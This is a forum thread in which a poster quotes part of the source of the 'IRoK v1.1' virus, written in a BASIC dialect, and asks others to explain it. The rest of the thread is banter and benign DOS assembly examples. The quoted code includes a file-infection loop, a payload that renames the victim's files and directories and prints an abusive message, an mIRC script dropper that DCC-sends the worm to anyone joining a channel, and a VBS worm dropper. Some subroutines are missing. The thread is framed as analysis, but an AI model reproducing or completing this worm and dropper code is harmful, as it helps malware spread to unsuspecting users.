Let's walk through this virus source code, shall we?

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
The poster that goes by "Dustin" in this group posted the below.  Don't kno=
w where he got it, probably cut and paste from somewhere, but I'd thought i=
t could be a good exercise to go through it, line by line, and figure out w=
hat it does.  I would appreciate any comments, and I would cross-post this =
but Google Groups no longer supports that feature.

RL

(My comments in lines having REM in CAPS)


Quoted text here. Click to load it

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=3Dvarptr(buffer(0))
rem cx is how many bytes to write :)

REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

if file_handle>4 then
ax=3D&hex4000
bx=3Dfile_handle
cx=3Dbytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=3Dax
endif
return

REM - what do the lines above do?  Perhaps file_handle > 4 goes to long fil=
e names?  what address is "&hex4000"?  why set bx,cx to these values, and w=
hat about na?  Is this a 'null' or 'zero' for remaining registers?

read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=3Dvarptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)

REM the above comments makes no sense, not to mention the stupid smileys ar=
e annoying.  But I don't see where the dx register was set to zero as he cl=
aims.


if file_handle>4 then
ax=3D&hex3f00
bx=3Dfile_handle
cx=3Dbytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=3Dax
endif
return

REM same as before, why?  Why is file_handle not < 4?  why this cutoff? Per=
haps very long file names are not supported by this program?

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=3D0
attr=3D6
kewl=3D0
virii=3D7

REM What are these parameters 'errcode' 'attr' why set to 6? etc

       CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ?  what is this line for?

       WHILE ErrCode = 0
          CALL SUB "GetNameF" FileName$
  filename$=3Dvirupath$+filename$
  if sleepy=3D0 then
  gosub infect_check:
if infected=3D0 then
gosub lets_infect:
endif
else
errcode=3D1
endif
         CALL SUB "FindNextF" ErrCode
         if kewl=3Dvirii then
         errcode=3D1
         endif
   WEND

REM seems I understand what is going on at a conceptual level but without t=
he SUB functions not 100% clear.  Need the gosub 'lets_infect'

return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=3D1
if hre$>"20" then

REM what is the above line doing?    

rem Executables remain offline for the remainder of the evening.
clear_to_run=3D0
endif


if min$=3D"17" then


rem We're fixing to hose this dudes drive. Well, not really.

REM typical stupid self-aggrandizing comment.  Imagine--this guy is writing=
 this for a future audience.  Ironically, now that he has an audience (if i=
n fact our Dustin is the real author) he will not or cannot explain his cod=
e.  Wow, that speaks volumes.  Either incompetence / fakery, excessive misp=
laced paranoia about the law and how it operates (and he's already in deep =
water, for reasons he does not even understand), or just playing drama game=
s for his clueless kiddie script non-programmer followers


rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any fucking joint, any fuckin Day."
print""
print"Fuck all these gun toting hip gangster wannabes. Fuck your"
print"tattoes, fuck all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :-)"
gosub keypress:

if min$=3D"21" then
print"=C5=BE IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

REM what is the above?  Perhaps to display something in stdout, the console=
?  Is this a console mode MS-DOS virus?



rem End of payload jumpsystem!

mirc_drop:
filename$=3Ddrive$
filename$=3Dfilename$+"mirc\irok.exe"
script$=3Ddrive$
script$=3Dscript$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.


REM need subs--that's where the action is...Dustin did not provide. Scared =
again it seems.

tempfile$=3Dfilename$
filename$=3Dscript$
gosub set_attr:
filename$=3Dtempfile$
rem drop script
open"o",2,script$
sensitivemsg=3D1
msg$=3D"[script]|n0=3Don 1:JOIN:#:{|n1=3Dif ($nick !=3D $me) {|"
gosub dump_msg:
msg$=3D"n2=3D    /dcc send $nick "
msg$=3Dmsg$+filename$
msg$=3Dmsg$+"|"
gosub dump_msg:
msg$=3D"n3=3D  }|n4=3D}|n5=3Don 1:TEXT:irok:#:/amsg My computer is 0wned by=
 IRoK
v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=3D0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=3D1
endif
close 2
if vbsdrop=3D1 then
tempname$=3Dfilename$
filename$=3D"c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=3Dtempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=3D1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=3D0
gosub set_attr:
gosub create_file:
tempsize=3Dvirus_size
tempsize=3Dtempsize+1
bytesize=3Dtempsize
dx=3Dvarptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.

Quoted text here. Click to load it


It's missing stuff.  See the above and comment.

Quoted text here. Click to load it

RL

PS--I challenge Dustin to show his 'mastery' of assembly by simply posting =
here a simple subroutine in assembly that will display "FSCK YOU" on the sc=
reen if a user runs the program.  Simple enough, but if Dustin is a cut-and=
-paste kiddie scripter as I suspect he is, he won't find this on the net an=
d will fail this simple test.


Re: Let's walk through this virus source code, shall we?


The poster that goes by "Dustin" in this group posted the below.  Don't know
where he got it, probably cut and paste from somewhere, but I'd thought it
could be a good exercise to go through it, line by line, and figure out what
it does.  I would appreciate any comments, and I would cross-post this but
Google Groups no longer supports that feature.

RL
Teenage jerk-off!!
Buffalo



Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

hehehe.. I'm starting to wonder about Rays age myself.. No experience with
older languages, inability to understand a very simple language...

and he keeps telling me i'm in my 60s. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

Dustin was thinking very hard :
Quoted text here. Click to load it

That goes a long way toward explaining why he thinks everyone *else* is
a poseur.



Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

Just use nasm. Copy my post source into notepad, be sure to save it as an
ascii text! file.

Make life easier for yourself.

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

nasm -f obj hello.asm
(you'll need a linker. google for msdos link.exe or tlink.exe)
link hello2
enter
enter
enter
you'll get an exe file.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"G. Morgan" wrote:

Quoted text here. Click to load it

a
mov dx,010c
mov ah,09
int 21
mov ax,4c00
int 21
db 42
db 6f
db 6f
db 21
db 24

g



Re: Let's walk through this virus source code, shall we?

p5b8pIo7NnZ2dnUVZ8tOdnZ2d@brightview.co.uk:

Quoted text here. Click to load it

Ant. :) Why you... lol



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:

Quoted text here. Click to load it

Why not? It gives me an opportunity to re-learn stuff. I thought
int 21, function 09 took a null-terminated string and had to check my
Advanced MS-DOS Programming book when the output was followed by
garbage!



Re: Let's walk through this virus source code, shall we?

dnZ2d@brightview.co.uk:

Quoted text here. Click to load it

No, It's good dude. I need someone else who also knows asm; I bow to your
superior knowledge of it tho, to double check mine. :) If you don't mind,
I mean.

I did the same damn thing as you when I wrote comit. I had a WTF moment.
;p


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:

Quoted text here. Click to load it

You're too kind (but I don't mind)!

Quoted text here. Click to load it

I get those WTF moments all the time when disassembling malware.
Sometimes you miss the obvious and sometimes it's a new anti-analysis
trick or unfamiliar API. It's a continual learning process.



Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

Well. Seems I'm locked out of 64bit malware samples. I can't debug them. I
don't have a 64bit platform. Any suggestions?


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:

Quoted text here. Click to load it

Same here but I rarely see them. I think the only 64-bit ones I've
got are rootkit loaders. CFF Explorer from ntcore.com can create a
disassembly listing of them without needing the hardware.



Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

Ahh, thanks.. a disassembly is better than nothing. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

Excellent.

Would you care to provide your opinion on my work below: Basically let
people know if it's bullshit code I came up with out of thin air, or
actually will function as written... [g] And if you don't mind, would
you also confirm my history for Ray and that irok is mine, as well as
this? Thanks. hehe.

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ah,0x3c
mov cx,0
mov dx,files
int 0x21

mov [filehnd],ax

mov ah,0x40
mov bx, [filehnd]
mov cx,[msglength]
mov dx,hello
int 0x21

mov ah,0x3e
mov bx,filehnd
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'Hi! Ray How did I get created Today?',13,10,'$'
files db 'ray.txt', 0
filehnd dw 1
msglength dw 38


segment stack stack
resb 64
stacktop:



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:

Quoted text here. Click to load it

Yes, it looks fine - apart from the fact there's no error checking,
particularly on the "create file" operation. However, error handling
is often omitted in examples for simplicity so, no biggie.

Quoted text here. Click to load it

I'm not sure that what I say will persuade Ray of anything. He seems
not to have read my comments and description of DOS interrupts in the
"hello world" code or has not understood (going by his reply to your
comments on the code). On the other hand, he may not be interested so
much in a dialog with me as trolling you. Anyway, for what it's worth,
you are the former VXer Raid and you wrote Irok. I've no reason to
suspect that you did not write this code example and I'm sure you
understand it.



Re: Let's walk through this virus source code, shall we?

On Saturday, August 4, 2012 9:01:03 AM UTC-4, Ant wrote:
Quoted text here. Click to load it

No I disagree Ant.  It's true I troll but I also make substantive points.  This
person is clearly attention seeking and he has not demonstrated he knows
anything about the code they copied and pasted.  

I did not respond to your posts because I lost them--using Google as a
newsreader--and I cannot easily find anything in a long thread.

I have downloaded an book on assembly and will study it in due time.  Right now
I'm learning F# just for fun.

Thanks for your insights.

RL

Re: Let's walk through this virus source code, shall we?


Quoted text here. Click to load it

I appreciate you taking the time to do this for me, Ant. Thanks very
much.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

on 7/28/2012, Dustin supposed :
Quoted text here. Click to load it

That's how vulnerabilities get written, the easiest thing to write. :o)



Re: Let's walk through this virus source code, shall we?

dnZ2d@brightview.co.uk:

Quoted text here. Click to load it

you know.. come to think of it, I think the garbage is your 64k memory
space being dumped.. ...


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Site Timeline